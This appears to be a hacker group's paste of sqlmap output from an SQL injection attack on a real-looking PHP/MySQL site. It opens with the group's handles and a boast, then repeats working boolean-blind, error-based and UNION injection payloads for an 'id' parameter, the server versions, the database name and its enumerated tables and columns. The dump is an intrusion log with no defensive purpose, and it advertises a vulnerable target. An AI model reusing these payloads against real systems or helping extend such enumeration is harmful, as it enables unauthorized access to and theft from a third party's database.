What have we found eh?

1. ==========
2. Ares
3. Skype: scientific.
4. AIM: Cx000000
5. #Citrus Squad
6. ==========
7.  
8.  
9. sqlmap identified the following injection point(s) with a total of 263 HTTP(s) requests:
10. ---
11. Parameter: id (GET)
12. Type: boolean-based blind
13. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
14. Payload: id=140 RLIKE (SELECT (CASE WHEN (6525=6525) THEN 140 ELSE 0x28 END))
15.  
16. Type: error-based
17. Title: MySQL >= 4.1 OR error-based - WHERE, HAVING clause
18. Payload: id=140 OR ROW(5751,9932)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(5751=5751,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM (SELECT 5115 UNION SELECT 2309 UNION SELECT 1836 UNION SELECT 5532)a GROUP BY x)
19.  
20. Type: UNION query
21. Title: Generic UNION query (NULL) - 1 column
22. Payload: id=140 UNION ALL SELECT CONCAT(0x7176787671,0x556953527356487a4542,0x7162626a71)--
23. ---
24. web application technology: PHP 4.3.9, Apache 2.0.52
25. back-end DBMS: MySQL 4.1
26. available databases [1]:
27. [*] magicwings2010bs
28.  
29. sqlmap resumed the following injection point(s) from stored session:
30. ---
31. Parameter: id (GET)
32. Type: boolean-based blind
33. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
34. Payload: id=140 RLIKE (SELECT (CASE WHEN (6525=6525) THEN 140 ELSE 0x28 END))
35.  
36. Type: error-based
37. Title: MySQL >= 4.1 OR error-based - WHERE, HAVING clause
38. Payload: id=140 OR ROW(5751,9932)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(5751=5751,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM (SELECT 5115 UNION SELECT 2309 UNION SELECT 1836 UNION SELECT 5532)a GROUP BY x)
39.  
40. Type: UNION query
41. Title: Generic UNION query (NULL) - 1 column
42. Payload: id=140 UNION ALL SELECT CONCAT(0x7176787671,0x556953527356487a4542,0x7162626a71)--
43. ---
44. web application technology: PHP 4.3.9, Apache 2.0.52
45. back-end DBMS: MySQL 4.1
46. Database: magicwings2010bs
47. [3 tables]
48. +-----------+
49. | config |
50. | inventory |
51. | items |
52. +-----------+
53.  
54. sqlmap resumed the following injection point(s) from stored session:
55. ---
56. Parameter: id (GET)
57. Type: boolean-based blind
58. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
59. Payload: id=140 RLIKE (SELECT (CASE WHEN (6525=6525) THEN 140 ELSE 0x28 END))
60.  
61. Type: error-based
62. Title: MySQL >= 4.1 OR error-based - WHERE, HAVING clause
63. Payload: id=140 OR ROW(5751,9932)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(5751=5751,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM (SELECT 5115 UNION SELECT 2309 UNION SELECT 1836 UNION SELECT 5532)a GROUP BY x)
64.  
65. Type: UNION query
66. Title: Generic UNION query (NULL) - 1 column
67. Payload: id=140 UNION ALL SELECT CONCAT(0x7176787671,0x556953527356487a4542,0x7162626a71)--
68. ---
69. web application technology: PHP 4.3.9, Apache 2.0.52
70. back-end DBMS: MySQL 4.1
71. Database: magicwings2010bs
72. Table: config
73. [1 column]
74. +--------+---------+
75. | Column | Type |
76. +--------+---------+
77. | id | numeric |
78. +--------+---------+